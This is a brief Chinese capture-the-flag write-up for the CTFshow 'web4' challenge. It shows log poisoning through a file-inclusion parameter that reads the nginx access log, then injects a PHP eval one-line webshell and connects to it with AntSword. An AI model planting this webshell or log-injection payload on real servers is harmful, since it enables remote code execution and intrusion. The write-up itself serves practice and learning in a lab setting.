刷题之旅第24站,CTFshow web4

感谢ctf show平台提供题目

老套路使用php伪协议 已经不行了。
在这里插入图片描述

那么我们进行 日志注入 获取shell
输入一下默认目录,得到了日志文件

?url=/var/log/nginx/access.log

在这里插入图片描述写入一句话

<?php @eval($_POST['pass']);?>

在这里插入图片描述

使用burp进行一下改包,不然写入的一句话会被进行url编码。

在这里插入图片描述

打开AntSword工具,进行连接。

在这里插入图片描述

使用文件管理功能,找到flag文件。
在这里插入图片描述

原创文章不易,点个赞再走吧。
在这里插入图片描述

发布了50 篇原创文章 · 获赞 12 · 访问量 1891

猜你喜欢

转载自blog.csdn.net/weixin_45940434/article/details/104351293